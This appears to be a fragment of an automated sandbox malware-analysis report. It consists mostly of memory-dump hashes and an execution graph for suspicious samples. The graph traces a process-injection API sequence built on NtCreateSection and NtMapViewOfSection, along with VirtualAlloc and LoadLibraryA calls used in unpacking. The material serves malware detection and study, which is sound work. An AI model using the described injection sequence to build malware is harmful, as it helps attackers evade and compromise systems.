                                                        • Opcode Fuzzy Hash: 8a862624c9c8d19efa1d26523557a9dd9aec59f6d0bedcae5372ede4c36b5f57
                                                        • Instruction Fuzzy Hash: 5D113631D1D216DBDB11EBB488947FE27A1AB95330F140515D041AB2D5CFE41CC6EBE2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $n
                                                        • API String ID: 0-1571361842
                                                        • Opcode ID: 03df9b75274bdd36b402edcf94e9e9b4215b1db9794d3edb5efd0805de566739
                                                        • Instruction ID: 1c5841ec0562ca89731591f69ef30b249003bb06ea5cce833d374c1ae91a91ed
                                                        • Opcode Fuzzy Hash: 03df9b75274bdd36b402edcf94e9e9b4215b1db9794d3edb5efd0805de566739
                                                        • Instruction Fuzzy Hash: B7F0AF22A0D3811FC7136378A8216AE3FA26EC325071D45BFD146DF692EE255D0A97E3
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88bcc2927451ed5caf0a91060ca89b1380662f9b465456354d93562fa8966d9a
                                                        • Instruction ID: 964ae5d60971af1113bcaf171f67fb7bd71155ab6970af45f0144fddd560db08
                                                        • Opcode Fuzzy Hash: 88bcc2927451ed5caf0a91060ca89b1380662f9b465456354d93562fa8966d9a
                                                        • Instruction Fuzzy Hash: 34F02B3170D3401FC7095369AD60AAA3FB6EFCFB10704007EEA09C7395DA2C4C0A93A1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dcb206fc9742f6ab539f8d1687f780446586c606c9df4a8372183e0829a0d55
                                                        • Instruction ID: 35d4cd613cd9bda713cd217bd6374aa44c17e056dce5b50e61b22cbadc4d9625
                                                        • Opcode Fuzzy Hash: 7dcb206fc9742f6ab539f8d1687f780446586c606c9df4a8372183e0829a0d55
                                                        • Instruction Fuzzy Hash: F1414F34B002088FDB15EB69C554BEDBBF2BF88310F248169D416AB395CB75EC82DB91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65f8a4f75e1403c7df0ac671347624f3740a22d496bb5495712f2c57f420121f
                                                        • Instruction ID: 15dad50e237af20eceb82d284cbdaa31b042798e46b546a76e37abaa04b70f47
                                                        • Opcode Fuzzy Hash: 65f8a4f75e1403c7df0ac671347624f3740a22d496bb5495712f2c57f420121f
                                                        • Instruction Fuzzy Hash: DF416234B002088FCB15EB65C554BEEBBF2BF88310F248169D416AB395DB35EC82DB91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6a24d092a3ab5890e4705950d7d5cfd3577e62196395d6202e78120355d44db
                                                        • Instruction ID: 72d7f0bb59c75336cd4d15668d975b369ea07f8fba15c90387e995aca28b453d
                                                        • Opcode Fuzzy Hash: c6a24d092a3ab5890e4705950d7d5cfd3577e62196395d6202e78120355d44db
                                                        • Instruction Fuzzy Hash: 2821C330B04154CFDB04EB65C4657BE32A2BB84710F244168E102EB3A5CFB88DC2A7D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6a41e36882339be3a0502e9f079fc97e0cb7a5ca64cac7ec59ab8d1d78bd20e
                                                        • Instruction ID: e7de40d168c4c8e0e897f1bc9acd976e68331a25c515d914b181bd8c1786bf74
                                                        • Opcode Fuzzy Hash: e6a41e36882339be3a0502e9f079fc97e0cb7a5ca64cac7ec59ab8d1d78bd20e
                                                        • Instruction Fuzzy Hash: 31119030B04254CBDB18EB75C8657AE32A2BBC4710F244568E102EB7A5CFB88CC2A7D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a1d0dd1e29b93071f9d7fdaf3febe148e2f7b8239b254e012bd78828d709824
                                                        • Instruction ID: a6a19e6deed670ddfeafecce32b5a0fc9b32b09d86071a2c60d6ee4ab51b151d
                                                        • Opcode Fuzzy Hash: 6a1d0dd1e29b93071f9d7fdaf3febe148e2f7b8239b254e012bd78828d709824
                                                        • Instruction Fuzzy Hash: 76118130B04154CBDB14EB7584657AE32A2BBC9714F644569E102EB7A5CFB88CC2A7D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 970defb427ddad91244a2ee68e815ae093adfe63d304017aa79d2778963f989c
                                                        • Instruction ID: cb1c8cfc67a4d867f37bb4ff0389727b9d511296837e0958271a357e57194799
                                                        • Opcode Fuzzy Hash: 970defb427ddad91244a2ee68e815ae093adfe63d304017aa79d2778963f989c
                                                        • Instruction Fuzzy Hash: FB01F274B082412FCB25AB78B8949BF7BE6EBC4720314823DE149CF395EE64DC028791
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e79a60c9ed62afff884d55a79e9ffce3afbb9eb8c19167e5445b4ee05224e580
                                                        • Instruction ID: d810880626af8f0cd32937a9af2f320b52d5d91e795fab79e328af07ec86cdbb
                                                        • Opcode Fuzzy Hash: e79a60c9ed62afff884d55a79e9ffce3afbb9eb8c19167e5445b4ee05224e580
                                                        • Instruction Fuzzy Hash: 84015230A051149BDB54AB65C859BEE76B2AB89710F140528E442BB391CFB85C8597D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3937b4b9421ece821a14e57279906b6c685aa9bc78058270e5fe8a80ef0d2a
                                                        • Instruction ID: 877e284b130425392016ed3b2ce50f136f4aec7230fe5c6950c7a9c62e0a90d4
                                                        • Opcode Fuzzy Hash: 1c3937b4b9421ece821a14e57279906b6c685aa9bc78058270e5fe8a80ef0d2a
                                                        • Instruction Fuzzy Hash: CCF0C274B042112BCB14BB69F8949AF77EAEBC4760300813DE509CF354EE70EC428790
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 173ca7dad818ba5f45a1ba7c3a1a75b6fc2e4f4f8aa353aeb71dc47553313408
                                                        • Instruction ID: 8568d9f08033d56247885d4ca02d814638b54b884ae224889012c7e190393b1a
                                                        • Opcode Fuzzy Hash: 173ca7dad818ba5f45a1ba7c3a1a75b6fc2e4f4f8aa353aeb71dc47553313408
                                                        • Instruction Fuzzy Hash: 6C016D35B002048BCB25EB68E8906EDB7F3BFC8310B144529D5169B355CB75AC469B92
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 236ae1a6aad2d10db67fd587126153790abc12ecace0e5977ec663c101e18484
                                                        • Instruction ID: 7342fd201bb5fc5c94534ba2c32834b84c78a968aac57c16cb932565116e413d
                                                        • Opcode Fuzzy Hash: 236ae1a6aad2d10db67fd587126153790abc12ecace0e5977ec663c101e18484
                                                        • Instruction Fuzzy Hash: C0F08C30A15118CBDB14EF65C8557EE72A2BB88320F240529E002AB791CFB88CC2A7D2
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9be1e4eb749efe209c242ca0d98d5d172a28a5fa3d11a20f2c3485b5b71551eb
                                                        • Instruction ID: e64e716592a121e7f3e3876c4c4a701f5ec286b51f7332b817e41234267b600f
                                                        • Opcode Fuzzy Hash: 9be1e4eb749efe209c242ca0d98d5d172a28a5fa3d11a20f2c3485b5b71551eb
                                                        • Instruction Fuzzy Hash: 8CE0223230D2941FDB46176C6820DBA3FA68FC9760B09027AE24AC7795CE688C0B93D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 260eed8f18063c1f83da398a94f584e0e1adc3baa1dc3cecdf550918b8073a1b
                                                        • Instruction ID: 1e5425ad1a468bfc9a6bf6525c673a3d29e9c9dd0e3eed179049a97cecf7de3b
                                                        • Opcode Fuzzy Hash: 260eed8f18063c1f83da398a94f584e0e1adc3baa1dc3cecdf550918b8073a1b
                                                        • Instruction Fuzzy Hash: 03E0DF357042102BC709276CE910BAB77EACFC9BA0F090029FA09D7385CF685C1363E0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7289bc56d6c139517337039f05f473077836bdcadd1d5cc2780a8761d92f65b
                                                        • Instruction ID: dc044af07cd68b813200cadab9803ac44f2b04760acbdc6e0b319ceece920d7f
                                                        • Opcode Fuzzy Hash: a7289bc56d6c139517337039f05f473077836bdcadd1d5cc2780a8761d92f65b
                                                        • Instruction Fuzzy Hash: 22D01274905108EF8B00EFA4E94199EB7B9DB84600B1041AED808E7210DA322F019791
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000003.1321698653.0000000004C2C000.00000004.00000020.00020000.00000000.sdmp, Offset: 04C1F000, based on PE: false
                                                        • Associated: 00000007.00000003.1317885290.0000000004C1F000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_3_4c1f000_xJOdjN6fVDYC0Ta4cXD9JBiF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !$$$$$&$/M$2$<$C$SH1A$]$b
                                                        • API String ID: 0-2398759843
                                                        • Opcode ID: 3f6b7b1e932983fc4636392aa991161f8d555b32f8d4155b5de9dfa49d88fc84
                                                        • Instruction ID: 4d48f41456c350bb102e59cec3f95c765311fef2a067ed52ceb6768f7d489ecb
                                                        • Opcode Fuzzy Hash: 3f6b7b1e932983fc4636392aa991161f8d555b32f8d4155b5de9dfa49d88fc84
                                                        • Instruction Fuzzy Hash: 4B91A530C0429DDEEF25DBA4C944BEDBB75AF16308F1485D9D10677281DBB42B88DBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000003.1321698653.0000000004C2C000.00000004.00000020.00020000.00000000.sdmp, Offset: 04C2C000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_3_4c1f000_xJOdjN6fVDYC0Ta4cXD9JBiF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !$$$$$&$/M$2$<$C$SH1A$]$b
                                                        • API String ID: 0-2398759843
                                                        • Opcode ID: 17548ea9846a4a0f10ef20a8c86725d7ab0b9de170c04dcbf3e3529071c6332b
                                                        • Instruction ID: 4d48f41456c350bb102e59cec3f95c765311fef2a067ed52ceb6768f7d489ecb
                                                        • Opcode Fuzzy Hash: 17548ea9846a4a0f10ef20a8c86725d7ab0b9de170c04dcbf3e3529071c6332b
                                                        • Instruction Fuzzy Hash: 4B91A530C0429DDEEF25DBA4C944BEDBB75AF16308F1485D9D10677281DBB42B88DBA1

                                                        Execution Graph

                                                        Execution Coverage:8.3%
                                                        Dynamic/Decrypted Code Coverage:45%
                                                        Signature Coverage:44%
                                                        Total number of Nodes:109
                                                        Total number of Limit Nodes:4
                                                        execution_graph 3398 3021e02 3401 3021e12 3398->3401 3402 3021e21 3401->3402 3405 30225b2 3402->3405 3406 30225cd 3405->3406 3407 30225d6 CreateToolhelp32Snapshot 3406->3407 3408 30225f2 Module32First 3406->3408 3407->3406 3407->3408 3409 3022601 3408->3409 3410 3021e11 3408->3410 3412 3022271 3409->3412 3413 302229c 3412->3413 3414 30222e5 3413->3414 3415 30222ad VirtualAlloc 3413->3415 3414->3414 3415->3414 3503 402e20 3504 402e24 3503->3504 3505 402dd5 3503->3505 3506 4019e3 15 API calls 3504->3506 3507 403029 3504->3507 3506->3507 3508 401620 3509 401626 3508->3509 3510 4016c6 NtDuplicateObject 3509->3510 3519 4017e2 3509->3519 3511 4016e3 NtCreateSection 3510->3511 3510->3519 3512 401763 NtCreateSection 3511->3512 3513 401709 NtMapViewOfSection 3511->3513 3514 40178f 3512->3514 3512->3519 3513->3512 3515 40172c NtMapViewOfSection 3513->3515 3516 401799 NtMapViewOfSection 3514->3516 3514->3519 3515->3512 3517 40174a 3515->3517 3518 4017c0 NtMapViewOfSection 3516->3518 3516->3519 3517->3512 3518->3519 3544 2e10001 3545 2e10005 3544->3545 3550 2e1092b GetPEB 3545->3550 3547 2e10030 3552 2e1003c 3547->3552 3551 2e10972 3550->3551 3551->3547 3553 2e10049 3552->3553 3554 2e10e0f 2 API calls 3553->3554 3555 2e10223 3554->3555 3556 2e10d90 GetPEB 3555->3556 3557 2e10238 VirtualAlloc 3556->3557 3558 2e10265 3557->3558 3559 2e102ce VirtualProtect 3558->3559 3561 2e1030b 3559->3561 3560 2e10439 VirtualFree 3564 2e104be LoadLibraryA 3560->3564 3561->3560 3563 2e108c7 3564->3563 3565 2e10005 3566 2e1092b GetPEB 3565->3566 3567 2e10030 3566->3567 3568 2e1003c 7 API calls 3567->3568 3569 2e10038 3568->3569 3574 4019ee 3575 4019f8 3574->3575 3576 401a2b Sleep 3575->3576 3577 401524 7 API calls 3576->3577 3578 401a46 3577->3578 3579 401615 7 API calls 3578->3579 3580 401a57 3578->3580 3579->3580 3570 402f74 3573 402f7e 3570->3573 3571 4019e3 15 API calls 3572 403029 3571->3572 3573->3571 3573->3572 3416 402f9c 3418 402f8f 3416->3418 3417 403029 3418->3417 3420 4019e3 3418->3420 3421 4019f3 3420->3421 3422 401a2b Sleep 3421->3422 3427 401524 3422->3427 3424 401a46 3426 401a57 3424->3426 3439 401615 3424->3439 3426->3417 3428 401533 3427->3428 3429 4016c6 NtDuplicateObject 3428->3429 3438 4015cd 3428->3438 3430 4016e3 NtCreateSection 3429->3430 3429->3438 3431 401763 NtCreateSection 3430->3431 3432 401709 NtMapViewOfSection 3430->3432 3433 40178f 3431->3433 3431->3438 3432->3431 3434 40172c NtMapViewOfSection 3432->3434 3435 401799 NtMapViewOfSection 3433->3435 3433->3438 3434->3431 3436 40174a 3434->3436 3437 4017c0 NtMapViewOfSection 3435->3437 3435->3438 3436->3431 3437->3438 3438->3424 3440 401626 3439->3440 3441 4016c6 NtDuplicateObject 3440->3441 3450 4017e2 3440->3450 3442 4016e3 NtCreateSection 3441->3442 3441->3450 3443 401763 NtCreateSection 3442->3443 3444 401709 NtMapViewOfSection 3442->3444 3445 40178f 3443->3445 3443->3450 3444->3443 3446 40172c NtMapViewOfSection 3444->3446 3447 401799 NtMapViewOfSection 3445->3447 3445->3450 3446->3443 3448 40174a 3446->3448 3449 4017c0 NtMapViewOfSection 3447->3449 3447->3450 3448->3443 3449->3450 3450->3426 3451 2e1003c 3452 2e10049 3451->3452 3464 2e10e0f SetErrorMode SetErrorMode 3452->3464 3457 2e10265 3458 2e102ce VirtualProtect 3457->3458 3460 2e1030b 3458->3460 3459 2e10439 VirtualFree 3463 2e104be LoadLibraryA 3459->3463 3460->3459 3462 2e108c7 3463->3462 3465 2e10223 3464->3465 3466 2e10d90 3465->3466 3467 2e10dad 3466->3467 3468 2e10238 VirtualAlloc 3467->3468 3469 2e10dbb GetPEB 3467->3469 3468->3457 3469->3468

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 101 40159d-4015a0 97->101 99 401582-401589 98->99 100 4015fd-401612 98->100 102 401560 99->102 103 40158b-40158d 99->103 104 4015a2-4015a4 101->104 105 4015e9-4015ef 101->105 102->92 107 401590-401592 103->107 106 4015f7 104->106 108 4015a6-4015c7 104->108 105->106 106->100 107->97 109 401643-401670 call 4012a9 108->109 110 4015c9 108->110 120 401672 109->120 121 401675-40167a 109->121 110->107 111 4015cb 110->111 111->101 113 4015cd 111->113 113->105 120->121 123 401680-401691 121->123 124 401991-401999 121->124 127 401697-4016c0 123->127 128 40198f 123->128 124->121 129 40199e-4019e0 call 4012a9 124->129 127->128 137 4016c6-4016dd NtDuplicateObject 127->137 128->129 137->128 138 4016e3-401707 NtCreateSection 137->138 141 401763-401789 NtCreateSection 138->141 142 401709-40172a NtMapViewOfSection 138->142 141->128 143 40178f-401793 141->143 142->141 145 40172c-401748 NtMapViewOfSection 142->145 143->128 146 401799-4017ba NtMapViewOfSection 143->146 145->141 148 40174a-401760 145->148 146->128 149 4017c0-4017dc NtMapViewOfSection 146->149 148->141 149->128 151 4017e2 call 4017e7 149->151
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                        • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                        • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                        • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 155 401615-401632 159 401643 155->159 160 401639-401670 call 4012a9 155->160 159->160 167 401672 160->167 168 401675-40167a 160->168 167->168 170 401680-401691 168->170 171 401991-401999 168->171 174 401697-4016c0 170->174 175 40198f 170->175 171->168 176 40199e-4019e0 call 4012a9 171->176 174->175 184 4016c6-4016dd NtDuplicateObject 174->184 175->176 184->175 185 4016e3-401707 NtCreateSection 184->185 188 401763-401789 NtCreateSection 185->188 189 401709-40172a NtMapViewOfSection 185->189 188->175 190 40178f-401793 188->190 189->188 192 40172c-401748 NtMapViewOfSection 189->192 190->175 193 401799-4017ba NtMapViewOfSection 190->193 192->188 195 40174a-401760 192->195 193->175 196 4017c0-4017dc NtMapViewOfSection 193->196 195->188 196->175 198 4017e2 call 4017e7 196->198
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                        • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                        • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                        • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 401635-401670 call 4012a9 210 401672 202->210 211 401675-40167a 202->211 210->211 213 401680-401691 211->213 214 401991-401999 211->214 217 401697-4016c0 213->217 218 40198f 213->218 214->211 219 40199e-4019e0 call 4012a9 214->219 217->218 227 4016c6-4016dd NtDuplicateObject 217->227 218->219 227->218 228 4016e3-401707 NtCreateSection 227->228 231 401763-401789 NtCreateSection 228->231 232 401709-40172a NtMapViewOfSection 228->232 231->218 233 40178f-401793 231->233 232->231 235 40172c-401748 NtMapViewOfSection 232->235 233->218 236 401799-4017ba NtMapViewOfSection 233->236 235->231 238 40174a-401760 235->238 236->218 239 4017c0-4017dc NtMapViewOfSection 236->239 238->231 239->218 241 4017e2 call 4017e7 239->241
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectView
                                                        • String ID:
                                                        • API String ID: 1652636561-0
                                                        • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                        • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                        • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                        • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 245 40162d-401632 247 401643 245->247 248 401639-401670 call 4012a9 245->248 247->248 255 401672 248->255 256 401675-40167a 248->256 255->256 258 401680-401691 256->258 259 401991-401999 256->259 262 401697-4016c0 258->262 263 40198f 258->263 259->256 264 40199e-4019e0 call 4012a9 259->264 262->263 272 4016c6-4016dd NtDuplicateObject 262->272 263->264 272->263 273 4016e3-401707 NtCreateSection 272->273 276 401763-401789 NtCreateSection 273->276 277 401709-40172a NtMapViewOfSection 273->277 276->263 278 40178f-401793 276->278 277->276 280 40172c-401748 NtMapViewOfSection 277->280 278->263 281 401799-4017ba NtMapViewOfSection 278->281 280->276 283 40174a-401760 280->283 281->263 284 4017c0-4017dc NtMapViewOfSection 281->284 283->276 284->263 286 4017e2 call 4017e7 284->286
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                        • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                        • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                        • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 290 401620-401632 293 401643 290->293 294 401639-401670 call 4012a9 290->294 293->294 301 401672 294->301 302 401675-40167a 294->302 301->302 304 401680-401691 302->304 305 401991-401999 302->305 308 401697-4016c0 304->308 309 40198f 304->309 305->302 310 40199e-4019e0 call 4012a9 305->310 308->309 318 4016c6-4016dd NtDuplicateObject 308->318 309->310 318->309 319 4016e3-401707 NtCreateSection 318->319 322 401763-401789 NtCreateSection 319->322 323 401709-40172a NtMapViewOfSection 319->323 322->309 324 40178f-401793 322->324 323->322 326 40172c-401748 NtMapViewOfSection 323->326 324->309 327 401799-4017ba NtMapViewOfSection 324->327 326->322 329 40174a-401760 326->329 327->309 330 4017c0-4017dc NtMapViewOfSection 327->330 329->322 330->309 332 4017e2 call 4017e7 330->332
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
